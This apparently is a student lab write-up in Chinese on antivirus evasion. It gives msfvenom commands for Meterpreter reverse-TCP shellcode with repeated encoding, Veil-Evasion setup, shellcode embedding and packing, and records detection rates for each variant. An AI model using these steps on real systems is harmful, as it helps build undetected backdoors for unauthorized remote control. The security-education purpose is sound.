Exp3 MAL_免杀原理与实践
本次实验操使用Virustotal,VirScan作为测试平台,尝试通过Veil-Evasion重新,交叉编译,加壳等方式逃过杀软检测。
目录
Exp3 MAL_免杀原理与实践
实验内容
对msf生成后门程序的检测
Virustotal测试Ⅰ
Visscan测试Ⅰ
n次编码影响测试
Veil-Evasion应用
Virscan测试
Visual Studio2017 + shellcode生成后门
shellcode进化
主要思路
知识点
最后的进化--加壳
启发
对于反杀
实验内容
实验环境 Kali linux 64bit(虚拟机)
实验工具Virustotal,VirScan,Visual Studio
对msf生成后门程序的检测
采用Exp2中msf平台生成的反弹端口后门Hearthstone_backdoor.exe作为第一版对比。
Virustotal测试Ⅰ
Virustotal集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。
由上图可见,
File Name: Hearthstone_backdoor.exe
Detection Ratio: 21/66
报毒率比想象中低了一些,不过依旧是被主流杀软报毒了。
Visscan测试Ⅰ
Visscan中的 ++文件行为分析++ 很实用,毕竟是中文很亲切。
行为描述:
建立到一个指定的套接字连接
详情信息:
IP: **.168.233.**:4444, SOCKET = 0x000000c4
行为描述:
修改注册表
删除注册表键值
删除注册表键
基本上查出了后台的反弹端口特征。
n次编码影响测试
n = 8时,如图示Visscan给出警告,但没有文件行为分析!
VirusTotal分析结果:
File Name: Hearthstone_backdoor_encoded8.exe
Detection Ratio: 19/66
Veil-Evasion应用
Veil-Evasion是用其他语言如c,c#,phython,ruby,go,powershell等重写了meterperter,然后再通过不同方式编译成exe,共性特征比较少。
++安装方法见知识点++
Language: powershell
Payload: powershell/meterpreter/rev_tcp
Required Options: LHOST=192.168.xxx.xxx LPORT=4444
可以看到Veil-Evasion提供不同的编程语言以及payload对后门进行封装。
Rating: c/python = Excellent ruby/go = normal
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode
Virscan测试
ruby
Rating: 3/39
//效果客观
powershell
大兄弟还没测试就被电脑管家查出来了……
Rating: 5/39
Visual Studio2017 + shellcode生成后门
生成一个c语言格式的Shellcode数组
root@Kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=xxx -f c
设计程序系统调用该shellcode数组
运行结果——成功√
Windows Defender + 电脑管家 无报毒
Rating: 5/39
shellcode进化
root@Kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 12 LHOST=192.168.119.130 LPORT=443 -f c
//尝试两种编码 + 重编12次
实测连接成功√
virscan测试 效果极佳
Rating: 2/39
主要思路
Tip:
本次实验,主机通过设计反弹端口攻击,达到获取被控机权限的目的。
知识点
Kali下安装Veil-Evasion
//安装git:
sudo apt-get -y install git
//git命令行下载Veil Evasion:
git clone https://github.com/Veil-Framework/Veil-Evasion.git
//把它移动到opt目录下(可选):
mv Veil-Evasion /opt
//进入Veil Evasion所在目录:
cd /opt/Veil-Evasion/
//启动setup脚本开始安装:
bash setup/setup.sh -s
最后的进化--加壳
尝试用ASPack加密Hearthstone_backdoor.exe
压缩后,文件由17.5MB压缩至11.7MB
Rating: 4/39
效果惊人,怪不得冰河用的ASPack压缩。
加密壳Hyperion,在Kali里有hyperion的实现,将shellcode_v2用Veil-Evasion中的Hyperion组件加壳
Rating: 12/39
事实证明,加壳软件起了反作用…
大部分AV应该都增加了壳检测(凉
启发
本次实验给我的启发是,网络环境并没有想象中那么安全,杀软的检测并没有想象的完备。
对于反杀
NOTE:
一个后台程序,通过不同的平台和编码方式,以及重编码,可以减少特征码被检测率。
